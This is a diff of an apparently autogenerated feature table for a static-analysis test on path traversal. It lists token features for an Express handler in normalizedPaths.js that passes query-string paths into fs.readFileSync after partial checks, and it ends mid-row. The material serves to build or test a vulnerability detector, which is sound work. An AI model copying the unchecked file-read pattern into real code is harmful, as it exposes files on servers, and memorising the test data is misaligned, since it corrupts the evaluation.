+| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:35 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:210:8:210:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:210:8:210:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:210:8:210:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:210:8:210:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:210:8:210:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | calleeImports | fs | @@ -8655,6 +74861,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:210:21:210:34 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:213:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | app.get ... ized\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | app.get ... ized\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | app.get ... ized\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | exceptional return of app.get ... ized\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | exceptional return of app.get ... ized\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:1:223:2 | exceptional return of app.get ... ized\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:5:213:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:5:213:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:5:213:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | calleeImports | express | @@ -8662,6 +74883,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:213:9:213:37 | '/decod ... zation' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:213:39 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | calleeImports | express | @@ -8669,11 +74905,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | (req, r ... lized\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:40:223:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:41:213:43 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:213:46:213:48 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:213:46:213:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:213:46:213:48 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:213:46:213:48 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:213:46:213:48 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:7:214:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:214:14:214:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:25:214:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:25:214:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:25:214:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:25:214:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:25:214:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:35:214:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | calleeImports | path | @@ -8683,6 +74989,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:214:35:214:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:214:39:214:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:39:214:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:39:214:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:39:214:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:39:214:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:214:45:214:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:214:45:214:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:214:45:214:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:214:45:214:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:214:45:214:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:60 | !pathMo ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:60 | !pathMo ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:60 | !pathMo ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:60 | !pathMo ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:7:216:60 | !pathMo ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:8:216:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:19:216:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| 